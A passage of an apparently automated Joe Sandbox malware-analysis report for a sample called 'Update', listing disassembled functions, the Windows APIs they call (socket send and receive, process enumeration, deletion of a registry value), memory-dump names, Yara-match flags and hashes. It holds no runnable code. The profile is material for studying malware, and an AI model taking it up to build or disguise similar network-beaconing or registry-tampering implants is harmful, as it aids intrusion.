__lock.LIBCMT ref: 1000D9FA
InterlockedDecrement.KERNEL32(?), ref: 1000DA17
_free.LIBCMT ref: 1000DA2A
InterlockedIncrement.KERNEL32(03322830), ref: 1000DA42

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 4e920ccd90d0088b349a7666ce33f112c59c5ff822d0f6e49aec8d69fe8d2c9d
Instruction ID: a4a3804e7546e288cb55bc9b4da126fdc171610eea7e5ea66b0b3240b360b7e5
Opcode Fuzzy Hash: 4e920ccd90d0088b349a7666ce33f112c59c5ff822d0f6e49aec8d69fe8d2c9d
Instruction Fuzzy Hash: E2019235A057219BF701EF64988579EB3A1FF057D0F018116F851AB289CB34BA81CBE6

Function 100048C7 Relevance: 9.0, APIs: 6, Instructions: 44sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048E1
WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 100048EC
Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 100048F9
CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 10004914
CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 1000491D
Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 1000492E

Part of subcall function 10003F60: GetCurrentThreadId.KERNEL32 ref: 10003F65
Part of subcall function 10003F60: send.WS2_32(?,10017440,00000010,00000000), ref: 10003FC6
Part of subcall function 10003F60: SetEvent.KERNEL32(?), ref: 10003FE9
Part of subcall function 10003F60: InterlockedExchange.KERNEL32(?,00000000), ref: 10003FF5
Part of subcall function 10003F60: WSACloseEvent.WS2_32(?), ref: 10004003
Part of subcall function 10003F60: shutdown.WS2_32(?,00000001), ref: 1000401B
Part of subcall function 10003F60: closesocket.WS2_32(?), ref: 10004025

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
String ID:
API String ID: 1019945655-0
Opcode ID: 3a30db2477d7f785b2e787c45e20f2cfe3e7392a271029e59f364346de097013
Instruction ID: b3bd2b528433ae293362b27f5e3b1343b14dca1381540b702c4300f5d31fb9dc
Opcode Fuzzy Hash: 3a30db2477d7f785b2e787c45e20f2cfe3e7392a271029e59f364346de097013
Instruction Fuzzy Hash: 1AF096762046149BD210EBA9CC84D4BF3E9EFC8761B158B19F26987694CA71FC01CBA0

Function 037F9BA0 Relevance: 9.0, APIs: 6, Instructions: 42COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(?), ref: 037F9BD2
EnterCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9BE3
EnterCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9BF8
GdiplusShutdown.GDIPLUS(00000000,?,?,?,037F9B7B), ref: 037F9C04
LeaveCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9C15
LeaveCriticalSection.KERNEL32(0381FB64,?,?,?,037F9B7B), ref: 037F9C1C

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$DeleteGdiplusObjectShutdown
String ID:
API String ID: 4268643673-0
Opcode ID: fdfccc395333c35cc489f02c24fe5e203e278cfef47f0f25f26c4a1fa2e29894
Instruction ID: 1a1001ba9cc2329fe36aebecd5e634538bcd26e03e484c27d291c307873d23c1
Opcode Fuzzy Hash: fdfccc395333c35cc489f02c24fe5e203e278cfef47f0f25f26c4a1fa2e29894
Instruction Fuzzy Hash: 4D011EB5900704DFC704EFAAA89041AFBA9FA4932532486EEE218C7346C376C453CF94

Function 037F48D0 Relevance: 9.0, APIs: 6, Instructions: 36sleepsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F48E1
WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F48EC
Sleep.KERNEL32(00000258), ref: 037F48F9
CloseHandle.KERNEL32(?), ref: 037F4914
CloseHandle.KERNEL32(?), ref: 037F491D
Sleep.KERNEL32(0000012C), ref: 037F492E

Part of subcall function 037F3F60: GetCurrentThreadId.KERNEL32 ref: 037F3F65
Part of subcall function 037F3F60: send.WS2_32(?,038149C0,00000010,00000000), ref: 037F3FC6
Part of subcall function 037F3F60: SetEvent.KERNEL32(?), ref: 037F3FE9
Part of subcall function 037F3F60: InterlockedExchange.KERNEL32(?,00000000), ref: 037F3FF5
Part of subcall function 037F3F60: WSACloseEvent.WS2_32(?), ref: 037F4003
Part of subcall function 037F3F60: shutdown.WS2_32(?,00000001), ref: 037F401B
Part of subcall function 037F3F60: closesocket.WS2_32(?), ref: 037F4025

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Close$EventHandleObjectSingleSleepWait$CurrentExchangeInterlockedThreadclosesocketsendshutdown
String ID:
API String ID: 1019945655-0
Opcode ID: d09b5e6e86b66d9d1bb0863378b0c08adeb2b85198bad4f8486757e0a4cb084f
Instruction ID: d9d1e36b5f56926c2f4752fd9d87e8350f60e4b2ebe3692a3ad7503d458659dc
Opcode Fuzzy Hash: d09b5e6e86b66d9d1bb0863378b0c08adeb2b85198bad4f8486757e0a4cb084f
Instruction Fuzzy Hash: BBF030763046049BC624EBBDDC84D4BF3E9EFC9720B254B09E26987394CA75E801CBA0

Function 037F3300 Relevance: 9.0, APIs: 6, Instructions: 32synchronizationsleepCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F3311
Sleep.KERNEL32(00000258), ref: 037F331E
InterlockedExchange.KERNEL32(?,00000000), ref: 037F3326
WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F3332
WaitForSingleObject.KERNEL32(?,000000FF), ref: 037F333A
Sleep.KERNEL32(0000012C), ref: 037F334B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
String ID:
API String ID: 3137405945-0
Opcode ID: 1551b1c7014ff512b6e55fe847478ea19eb1cb391003f1af59a6412e5bfeb187
Instruction ID: babc1d4263a1cea84ec48c4eb1fa273ffe1edd4f1ead70c3990b640633be8dd8
Opcode Fuzzy Hash: 1551b1c7014ff512b6e55fe847478ea19eb1cb391003f1af59a6412e5bfeb187
Instruction Fuzzy Hash: 0AF012762047146BD610EBA9DC84D5AF3ECEF99734B204B49F265932D4CAB5E805CB60

Function 006E1D6F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 006E1D85
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 006E1D92
_CxxThrowException.VCRUNTIME140(?,006E27B4), ref: 006E1E99
_CxxThrowException.VCRUNTIME140(?,006E2808), ref: 006E1EB6

Strings

Unknown exception, xrefs: 006E1EC3

Memory Dump Source

Source File: 00000003.00000002.3509326012.00000000006E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000003.00000002.3509290719.00000000006E0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509363216.00000000006E2000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509400316.00000000006E3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.00000000006E4000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.3509430070.0000000000726000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6e0000_Update.jbxd

Similarity

API ID: ExceptionThrow$_callnewhmalloc
String ID: Unknown exception
API String ID: 4113974480-410509341
Opcode ID: a96718e251a3ae80f6c638ed5f2b1fe7b2a89717b7fd9cb3baca50a01305f099
Instruction ID: 0ba1154695e183cadf677470a6eff717e895ce3e902863aef4a8a441d1caadfa
Opcode Fuzzy Hash: a96718e251a3ae80f6c638ed5f2b1fe7b2a89717b7fd9cb3baca50a01305f099
Instruction Fuzzy Hash: 1FF0F4345023CD73CB04BAABDC269AD77AF5E02310BA08168F9149E191FF70EA45F1C4

Function 0381095B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 0381096E

Part of subcall function 038108C9: ___BuildCatchObjectHelper.LIBCMT ref: 038108FF

_UnwindNestedFrames.LIBCMT ref: 03810985
___FrameUnwindToState.LIBCMT ref: 03810993

Strings

csm, xrefs: 0381096A, 0381097F, 03810992, 038109B0, 038109C0
csm, xrefs: 0381095D

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
Instruction ID: 3dbc904a45e3cf6882f289017d70966b80e7b06bdd2d48bb7116760aace87a8a
Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
Instruction Fuzzy Hash: 4101E8B5401209BBDF12AF95CC44EEA7F6EFF08350F048094BD5899160D77699B1EBA2

Function 6CAA260F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9AFB9AC3,?,?,00000000,6CABC7DD,000000FF,?,6CAA26D0,6CAA25AA,?,6CAA276C,00000000), ref: 6CAA2644
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CAA2656
FreeLibrary.KERNEL32(00000000,?,?,00000000,6CABC7DD,000000FF,?,6CAA26D0,6CAA25AA,?,6CAA276C,00000000), ref: 6CAA2678

Strings

CorExitProcess, xrefs: 6CAA264E
mscoree.dll, xrefs: 6CAA263D

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 3bcddd5adfd9d78bac9354cce0868c13bd206077d473bd6ea4fe610b9732c6cf
Instruction ID: fa6c3aec44e09f31fbfdec1355c11c082093c6210726abd2b0b8af9cd7acc2d3
Opcode Fuzzy Hash: 3bcddd5adfd9d78bac9354cce0868c13bd206077d473bd6ea4fe610b9732c6cf
Instruction Fuzzy Hash: DB01673160561AAFDF059F94CC08FEEBBB8FB05715F004A25F822E2690DB759541CB90

Function 10013A50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 10013A63

Part of subcall function 100139BE: ___BuildCatchObjectHelper.LIBCMT ref: 100139F4

_UnwindNestedFrames.LIBCMT ref: 10013A7A
___FrameUnwindToState.LIBCMT ref: 10013A88

Strings

csm, xrefs: 10013A52
csm, xrefs: 10013A5F, 10013A74, 10013A87, 10013AA5, 10013AB5

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction ID: e6390535bab9e49693186baa48b022ad9d19c19648d68c038876df6954aae2ed
Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
Instruction Fuzzy Hash: AE01F675401109BBDF12DF51CC45EAB7F6AEF08390F508024FD5819121D776E9B1DBA1

Function 6CAB0B20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

PeekConsoleInputA.KERNEL32(?,gfff,6CAC9D70,00000000,?,6CAA3746,00000000,0000000C,6CAC9D70,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0B35
GetLastError.KERNEL32(?,6CAA3746,00000000,0000000C,6CAC9D70,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0B41

Part of subcall function 6CAB0C1D: CloseHandle.KERNEL32(FFFFFFFF,6CAB0B05,?,6CAA36DC,0000000C,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C2D

___initconin.LIBCMT ref: 6CAB0B51

Part of subcall function 6CAB0BFE: CreateFileW.KERNEL32(CONIN$,C0000000,00000003,00000000,00000003,00000000,00000000,6CAB0A79,6CAA36CB,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0C11

PeekConsoleInputA.KERNEL32(?,?,FFFFFFFF,?,6CAA3746,00000000,0000000C,6CAC9D70,66666667,?,?,6CAA33F4,6CAC9D70,0000000C,6CA81B27), ref: 6CAB0B65

Strings

gfff, xrefs: 6CAB0B29

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: ConsoleInputPeek$CloseCreateErrorFileHandleLast___initconin
String ID: gfff
API String ID: 1545762386-1553575800
Opcode ID: d7147ed2e7ed7db55fd66f382e4e26412f9381724cae3ec78e717fc2c3523cc9
Instruction ID: 2bb9818882a03509e4ce6e904462a9734b3824122f9733274f8463f2d08b15ee
Opcode Fuzzy Hash: d7147ed2e7ed7db55fd66f382e4e26412f9381724cae3ec78e717fc2c3523cc9
Instruction Fuzzy Hash: BCF0E53690025EBBCF166FD5CD049997F76FB093697048110FA19E6520CB32CDA1EF90

Function 037FB7E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 037FB800
RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 037FB810
RegCloseKey.ADVAPI32(?), ref: 037FB81B

Strings

Console, xrefs: 037FB7F6
IpDatespecial, xrefs: 037FB80A

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CloseDeleteOpenValue
String ID: Console$IpDatespecial
API String ID: 849931509-1840232981
Opcode ID: 05c75dc6fd163e741b0fa1f4489c3da0558cb4a54b9e0c624faa1cabfb9d32f5
Instruction ID: c7956c8aa1503e3d808a24da9b22e9d7b422e50977b1349b23b44827311c074f
Opcode Fuzzy Hash: 05c75dc6fd163e741b0fa1f4489c3da0558cb4a54b9e0c624faa1cabfb9d32f5
Instruction Fuzzy Hash: 50E08676245240EFD314E7A0AC4FF9A776CF78C711F004A9DF684E1141C595E551C665

Function 6CAAD3A5 Relevance: 7.7, APIs: 5, Instructions: 197COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6CAAD42A
__alloca_probe_16.LIBCMT ref: 6CAAD4F3
__freea.LIBCMT ref: 6CAAD55A

Part of subcall function 6CAAA641: HeapAlloc.KERNEL32(00000000,6CAADBE2,?,?,6CAADBE2,00000220,?,?,?), ref: 6CAAA673

__freea.LIBCMT ref: 6CAAD56D
__freea.LIBCMT ref: 6CAAD57A

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 8f26fc40b15d5d9f0a132155b6c8e76b559f0f20ef8b57b290f6d10ddd8d0d72
Instruction ID: 53deb052fc497a734f133ab8e633987805e0034e902bbfdd5cad7ae5a346fbed
Opcode Fuzzy Hash: 8f26fc40b15d5d9f0a132155b6c8e76b559f0f20ef8b57b290f6d10ddd8d0d72
Instruction Fuzzy Hash: 8251C3B2A012076FEB018EE4CD40EFB3BA9DF4571CB290528FD5497A50EB30DC96CA60

Function 037FB990 Relevance: 7.6, APIs: 5, Instructions: 116processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,4EB10097), ref: 037FB9DA
_memset.LIBCMT ref: 037FB9FB
_memset.LIBCMT ref: 037FBA4B
Process32FirstW.KERNEL32(00000000,?), ref: 037FBA65
Process32NextW.KERNEL32(00000000,0000022C), ref: 037FBAB7

Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Process32_memset$CreateFirstNextSnapshotToolhelp32_malloc
String ID:
API String ID: 2416807333-0
Opcode ID: c5483adc2990f9dc31f455602de67bb6cba19dda93b4b27feea08cdcfb6223b2
Instruction ID: fcf1983714ad00ce2424f2a6940d7467326d3b19be16a9c393a753a35a9a6b15
Opcode Fuzzy Hash: c5483adc2990f9dc31f455602de67bb6cba19dda93b4b27feea08cdcfb6223b2
Instruction Fuzzy Hash: FA41C471A00605EFEB10EFA4CC89FAAB7A8FF15714F044395EA159B3C0E7759A40CB91

Function 6CA84CA0 Relevance: 7.6, APIs: 5, Instructions: 107COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6CA84CD5
std::_Lockit::_Lockit.LIBCPMT ref: 6CA84CEF
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84D10
__Getctype.LIBCPMT ref: 6CA84DC4
std::_Lockit::~_Lockit.LIBCPMT ref: 6CA84DF7

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
String ID:
API String ID: 3087743877-0
Opcode ID: b4f75f1dcb70a15ad1337965736d5efd84cc03eaf76cbfb743969606cbc9ebb7
Instruction ID: 71b0c6d31385aaa0ee28190dff206b90d34590caf4432c06c72bb3b0e8f89601
Opcode Fuzzy Hash: b4f75f1dcb70a15ad1337965736d5efd84cc03eaf76cbfb743969606cbc9ebb7
Instruction Fuzzy Hash: CB418A71E012258FCB14DF98C955B9EBBF5FF44718F088119D859ABB40E734AA89CB90

Function 037F3CA0 Relevance: 7.6, APIs: 5, Instructions: 98networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000598,00000000), ref: 037F3CBF
SetLastError.KERNEL32(00000000,?,?,037F399F,?,?,00000000,000000FF,00000000), ref: 037F3CFA
GetLastError.KERNEL32(00000000), ref: 037F3D45
WSAGetLastError.WS2_32(?,?,037F399F,?,?,00000000,000000FF,00000000), ref: 037F3D7B
WSASetLastError.WS2_32(0000000D,?,?,037F399F,?,?,00000000,000000FF,00000000), ref: 037F3DA2

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: ErrorLast$recv
String ID:
API String ID: 316788870-0
Opcode ID: 0c4f5ec4c4396871ce82087f05ec055ef735288fff7e4c3c97ccd4d24bd93821
Instruction ID: f02f26a69eeb009bccdfa85c33ae304cd72720d599be9af7c38504b46adb08f1
Opcode Fuzzy Hash: 0c4f5ec4c4396871ce82087f05ec055ef735288fff7e4c3c97ccd4d24bd93821
Instruction Fuzzy Hash: 0631B17A6042008FFB64DF68D8C8B6A77ADFB85324F1505A6EF09DB389D731D881CA51

Function 03800EEB Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 03800EF9

Part of subcall function 037FF673: __FF_MSGBANNER.LIBCMT ref: 037FF68C
Part of subcall function 037FF673: __NMSG_WRITE.LIBCMT ref: 037FF693
Part of subcall function 037FF673: RtlAllocateHeap.NTDLL(00000000,00000001,74DEDFF0,00000000,00000000,?,03804500,?,74DEDFF0,00000000,?,038081D6,00000000,?,?,?), ref: 037FF6B8

_free.LIBCMT ref: 03800F0C

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 7661ecbdecd44804900ebe91135dcd1b6b67fbf6300ee8c43cad8aa577c51caa
Instruction ID: 7788e61c05a08fdc8a390ac46aa1c46de1fc6ae719272740cc9625e284f2f8bc
Opcode Fuzzy Hash: 7661ecbdecd44804900ebe91135dcd1b6b67fbf6300ee8c43cad8aa577c51caa
Instruction Fuzzy Hash: 3E11E776808B19AFCB61FFB4AC0875E7759AF403B0B1444E6E949DF2D0DE308540A794

Function 1000E5D7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1000E5E5

Part of subcall function 10006E83: __FF_MSGBANNER.LIBCMT ref: 10006E9C
Part of subcall function 10006E83: __NMSG_WRITE.LIBCMT ref: 10006EA3
Part of subcall function 10006E83: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F), ref: 10006EC8

_free.LIBCMT ref: 1000E5F8

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 073510cd7888ec162256f41c4b27844541b3ac2ad2a228e050a5b5aba56439fd
Instruction ID: 99b6cfc0e9903126c7bed8e87128f69c37c5ff73db012c927cbf40cb5b0e6f66
Opcode Fuzzy Hash: 073510cd7888ec162256f41c4b27844541b3ac2ad2a228e050a5b5aba56439fd
Instruction Fuzzy Hash: 2F113A36900A61ABFB229BB4BC0564E37D5FF443F1B214525F848BB198DF36DD404B94

Function 037F2C10 Relevance: 7.6, APIs: 5, Instructions: 51windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 037F2C3F
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 037F2C55
TranslateMessage.USER32(?), ref: 037F2C64
DispatchMessageW.USER32(?), ref: 037F2C6A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 037F2C78

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Message$Peek$DispatchMultipleObjectsTranslateWait
String ID:
